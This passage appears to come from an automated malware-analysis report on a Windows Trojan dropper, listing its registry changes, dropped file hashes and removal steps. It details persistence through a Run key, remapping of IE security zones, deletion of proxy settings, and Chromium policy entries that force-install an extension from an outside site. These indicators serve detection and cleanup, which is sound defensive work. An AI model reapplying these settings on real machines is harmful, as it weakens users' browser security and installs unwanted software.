[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 27 F1 88 0E E1 75 18 33 F1 61 EB 6C 2F 8C 6C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsr1A.tmp:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 94 7D 8D DD B7 45 67 F5 A0 16 99 EB A9 8A C7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst16.tmp:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 5F F4 C3 D1 3D 20 02 09 11 EB 20 ED 21 F9 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsw7.tmp:1224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 8B 40 2E BA BA 89 2F 39 61 50 03 36 01 DD 79"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-obi-tot-mdh-lvs-ppt-opw-jot-crr"
The process nsn24.tmp:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Setup3.exe" = "baidu Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 F8 10 64 69 5D 7A C5 76 47 62 07 CB 12 CB A6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process setup3.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 01 3C 9B AC CA EA 5D 94 CA E5 B2 F5 8C 9F 05"
The process nsoB.tmp:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 F8 D3 59 A7 F6 6C A4 6E F7 B5 F6 2A 37 1F 4D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process adv_128.exe:1276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 1F 37 31 23 99 9D 0E 3A 97 E2 F4 64 72 1C 3D"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"
The process setup3.tmp:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 BB 33 3D 28 F3 1B E8 6D 54 26 0D 95 44 D7 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"bind.exe" = "Bind"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe"
Dropped PE files
MD5 | File path |
---|---|
a85df53ac3cdc0b948809c73b39b0571 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg18.exe |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh1D.tmp |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\inetc.dll |
d70820984ba4484885bf5c56ae44c4ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nskE.tmp |
a66865416d1330f1c571c12f4f8c2fea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1A.tmp |
29bf30427bc3544fab563d0d7d36f05d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst16.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst20.tmp\registry.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst22.tmp\registry.dll |
a66865416d1330f1c571c12f4f8c2fea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
29bf30427bc3544fab563d0d7d36f05d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe |
dd326cafa8f8dfb20c5183a1cc3daab6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe |
900c797ab605bac6ba0de7e9aba3e7d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe |
a85df53ac3cdc0b948809c73b39b0571 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
